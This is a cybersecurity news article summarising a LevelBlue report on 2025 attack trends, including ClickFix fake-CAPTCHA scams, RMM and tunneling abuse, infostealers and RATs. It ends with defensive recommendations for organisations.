From fake CAPTCHAs to RATs: Inside 2025’s cyber deception threat trends

Cybercriminals are getting better at lying. That’s the takeaway from a new LevelBlue report, which outlines how attackers are using social engineering and legitimate tools to quietly move through environments before they’re caught.

Data showing at what stage an incident was detected (Source: LevelBlue)

In that short window, the number of customers affected by security incidents nearly tripled. The rate jumped from 6 percent in late 2024 to 17 percent in early 2025. More than half of those incidents began at the initial access stage. Once attackers were in, they moved quickly. The average time between compromise and lateral movement fell below 60 minutes. In some cases, it took less than 15.

That speed is possible because attackers continue to rely on familiar tools. Remote Desktop Protocol remains the most common method for moving from one system to another. Remote monitoring and management (RMM) software is widely used to keep access active. LevelBlue found many cases where multiple RMM tools were installed on the same host. Tunneling utilities help attackers avoid firewalls and keep their activity hidden. These tactics are not new, but they are being used with greater precision and automation.

“A striking development in the first half of 2025 is how much more sophisticated threat actors have become at deception,” said Fernando Martinez Sidera, Lead Threat Researcher at LevelBlue. “They’re moving beyond traditional BEC schemes and using targeted social engineering to manipulate users into opening the door. Once inside, they’re deploying remote access trojans and quickly covering their tracks, allowing them to move laterally through networks with alarming speed. This isn’t a one-off trend – we fully expect this shift to continue throughout 2026.”

Another trend is the drop in incidents tied to business email compromise. BEC still accounts for the largest share of initial access, at 57 percent, but this is down from 74 percent in the last reporting period. That shift is linked to the sharp rise in fake CAPTCHA scams and help desk impersonation. Social engineering now makes up 39 percent of initial access methods, nearly triple the rate from late 2024.

ClickFix is the campaign most often cited. In these attacks, users are tricked into copying a line of code into the Windows Run box. This is made to look like a routine CAPTCHA or security prompt. But instead of verifying anything, the user is launching a PowerShell command that connects to an external server and downloads malware. The payload is often a Remote Access Trojan such as NetSupport, Quasar, or Lumma Stealer. ClickFix-related activity rose more than 1,400 percent in just six months.

Once attackers get inside, they are relying on a combination of RMM tools and tunneling to maintain access. Tools like Plink and Ngrok are commonly used to create hidden connections. These blend in with normal IT operations, which makes them harder for defenders to spot. Some cases involved two or even three RMM tools installed at once.

The malware trends reflect this approach as well. Lumma Stealer was the most frequently seen infostealer in early 2025. It targets Windows systems and collects browser data, credentials, and cryptocurrency wallets. It is often delivered through phishing emails or fake CAPTCHA pages. Remote Access Trojans were also active. These included AsyncRAT, Remcos, and StealC. Each provides the attacker with full remote access and the ability to launch new attacks.

While data theft is on the rise, ransomware and encryption events have gone down. LevelBlue saw a 78 percent drop in ransomware cases and a 94 percent drop in unauthorized access incidents. That doesn’t mean the threat is gone. It likely signals that attackers are getting what they want without triggering alarms.

Defenders should take note. The report urges organizations to focus on user training, especially around social engineering tactics like fake CAPTCHAs. It also recommends tighter control over PowerShell, script execution, and tunneling tools. Segmenting networks, limiting lateral movement, and reviewing endpoint security policies are also key steps.